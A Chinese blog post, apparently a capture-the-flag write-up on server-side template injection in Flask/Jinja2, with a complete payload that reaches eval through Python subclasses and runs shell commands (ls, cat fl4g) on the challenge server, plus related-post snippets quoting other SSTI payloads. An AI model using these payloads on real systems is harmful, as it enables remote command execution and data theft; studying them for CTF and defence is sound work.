python_template_injection

最新推荐文章于 2024-05-15 08:37:31 发布
最新推荐文章于 2024-05-15 08:37:31 发布
阅读量2.8k 收藏 1
点赞数 4
分类专栏: CTF—web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicesa/article/details/106348529
版权

0x01漏洞介绍

Python Web 模板引擎

1.Jinja2

2.Tornado.template

3.Django.template

ornado 中模板渲染函数在有两个:

1.render

2.render_string

Flask 中模板渲染函数也是有两个

1.render_template

2.render_template_string

render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,在渲染的时候会把**{{}}**包裹的内容当做变量解析替换。

instance.__ class__ 可以获取当前实例的类对象

class.__ mro__ 获取当前类对象的所有继承类’

__ subclasses__()这个方法返回了类的所有存活的子类的引用

简而言之就是我们{{}}中的内容被当做了变量解析,那么我们可以利用这一点,调用python的类,实现我们想要达到的目的

0x02解题过程

在这里插入图片描述

拿到题目就一个这个提示,源码没有内容,所以,我们要拿到flag就得利用这个漏洞

漏洞检测:

http://124.126.19.106:33006/{{6+6}}

在这里插入图片描述
返回了{{}}中的执行结果,那说明,存在漏洞,接下来利用漏洞获取flag

{{ config.items() }}可以查看服务器的配置信息

http://124.126.19.106:33006/{{ config.items() }}

在这里插入图片描述

出现配置信息

payload:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}   
  {% if b.__class__ == {}.__class__ %}         //遍历基类 找到eval函数
    {% if 'eval' in b.keys() %}    //找到了
      {{ b['eval']('__import__("os").popen("ls").read()') }}  //导入cmd 执行popen里的命令 read读出数据
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

在这里插入图片描述
将ls命令改为 cat fl4g即可读取fl4g的内容,payload如下

{% for c in [].__class__.__base__.__subclasses__() %}

{% if c.__name__ == 'catch_warnings' %}

  {% for b in c.__init__.__globals__.values() %}  

  {% if b.__class__ == {}.__class__ %}         //遍历基类 找到eval函数

    {% if 'eval' in b.keys() %}    //找到了

      {{ b['eval']('__import__("os").popen("cat fl4g").read()') }} 

    {% endif %}

  {% endif %}

  {% endfor %}

{% endif %}

{% endfor %}

得到flag
在这里插入图片描述

怪味巧克力
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1136
好难啊
Web_python_template_injectionPython模块注入)
Welcome To Myon'Blog !
04-11 1348
Python的模块注入 flask/jinja2 常用于ssti的魔术方法 获取基类的几种方法 获取基本类的子类 采用os模块的listdir函数来读取目录 常用payload
Flask Web开发:使用render_template渲染动态HTML模板
最新发布
Code掘金的博客
05-15 1022
Flask是一个轻量级的Python Web框架,它提供了构建Web应用程序所需的基本工具和结构。Flask的设计哲学强调简单性和灵活性,使得开发者可以快速搭建和部署Web应用。
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 2302
攻防世界,python模板注入
攻防世界web进阶区Web_python_template_injection详解
hxhxhxhxx的博客
07-28 1640
攻防世界web进阶区Web_python_template_injection详解题目详解python模板/框架Python中可以利用的方法和模块ssti常用注入,以及绕过姿势 题目 显而易见,根据题目的翻译 我们知道他是一个python的模板注入,ssti模板注入 详解 这里我们输入 http://220.249.52.133:55983/{{7+7}} 发现可以进行模板注入 这个题目和另外一个有点区别,tplmap并不能进行扫描 tplmap适用于有参数的一些模板注入 类对象并未发现 http:
template-injection-workshop:模板注入研讨会(6个练习),涵盖了Twig,Jinja2,Tornado,Velocity和Freemaker引擎
05-23
模板注入车间该存储库包含在Hackfest 2020上展示的所有测试应用程序。阅读教程幻灯片: : 自己运行应用程序所有应用程序代码和docker脚本... git clone https://github.com/GoSecure/template-injection-workshop.git
Python-基于angular5x开发基本项目模块依赖
08-10
**四、依赖注入(Dependency Injection)** Angular的依赖注入(DI)系统允许组件轻松获取其依赖的服务。在组件类中,通过构造函数声明依赖,Angular会自动提供这些服务实例。例如,`constructor(private ...
模板注入与_FLASK.pdf
08-08
Server Side Template Injection, 服务端模板注入,最初由James Kettle在2015年的黑帽大会上讲解。来自小米安全的安全工程师——Dayeh(呆爷),主要从模版注入Flask方向为大家带来了精彩的分享。 模板注入相较于...
flaskssti:测试SSTI
02-21
标题中的“flaskssti”指的是一个与Python web框架Flask相关的项目,可能是一个扩展或教程,专注于“SSTI”(Server-Side Template Injection,服务器端模板注入)。SSTI是一种安全漏洞,允许攻击者通过操纵模板引擎...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character)...
python template injection_月末总结(python模板注入)
weixin_35786588的博客
01-13 340
什么是模板:模板引擎用于使用动态数据呈现内容。此上下文数据通常由用户控制并由模板进行格式化,以生成网页、电子邮件等。模板引擎通过使用代码构造(如条件语句、循环等)处理上下文数据,允许在模板中使用强大的语言表达式,以呈现动态内容。如果攻击者能够控制要呈现的模板,则他们将能够注入可暴露上下文数据,甚至在服务器上运行任意命令的表达式。flask:Flask是一个使用 Python 编写的轻量级 Web ...
攻防世界-Web_python_template_injection详解
Mr_helloword的博客
08-12 6858
Web_python_template_injection 在做这道题之前如果大家不懂可以先看一看这篇文章: 从零学习flask模板注入 基础知识: 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 1.判断有无模板注入 payload http://220.249.52.133:53362/{{7+7}} 查看全局变量 http://220.249.52.133:53362/{{config}} 基础知识: 文件包含:是通过python
攻防世界之Web_python_template_injection (web进阶)
my_name_is_sy的博客
06-29 1968
考点为模板漏洞及其利用。
Python-模板注入
m0_51428325的博客
12-26 1812
何为模板注入? 模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,哲大大提升了开发效率,良好的设计也是的代码重用变得更加容易。 到那时模板引擎也拓宽了我们的攻击面,注入到模板中的代码可能会引发RCE或者XSS flask基础 在学习SSTI之前,先把flask的运作流程搞明白,这样有利于更加快速的理解原理 路由 先看一段代码 from flask import flask @app.route('/index/') def hello_word(): .
Flask的渲染方法函数---render_template()/render_template_string()
weixin_53146913的博客
04-19 7597
渲染方法 Flask 中的渲染方法有两种 : render_template() 和 render_template_string() render_template() 函数 渲染一个指定的文件 , 这个指定的文件其实就是模板 模板中代码 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</title&g
[wp] 攻防世界 Web_python_template_injection
MercyLin的博客
09-28 6614
7*7变成49了,应该存在模板注入 http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()%7D%7D http://111.198.29.45:54330/%7B%7B[].__class__.__base__.__subclasses__()[59].__init__.func_globals.key...
攻防世界Web_python_template_injection
MIGENGKING的博客
04-23 3499
打开题目: 题目提示为Python模块注入: 1首先判断一下: 网址输入“{{7+7}}”页面显示14,说面存在“SSTI” : SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja...
[wp] Web_python_template_injection 攻防世界
夏日 の blog
02-06 1325
打开题目我们看到 提示python模板注入,尝试{{1+1}}看看{{}}是否被执行 由上图可知代码被执行确实存在模板注入 1.查看所有子类 {{[].__class__.__base__.__subclasses__()}} ...
web_python_template_injection
03-16
Web Python 模板注入是一种在Web应用程序中使用Python模板引擎时可能存在的安全漏洞。通过将恶意代码注入到模板中,攻击者可能能够执行任意代码,访问敏感信息,或者控制应用程序。应该通过验证用户输入并使用严格的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值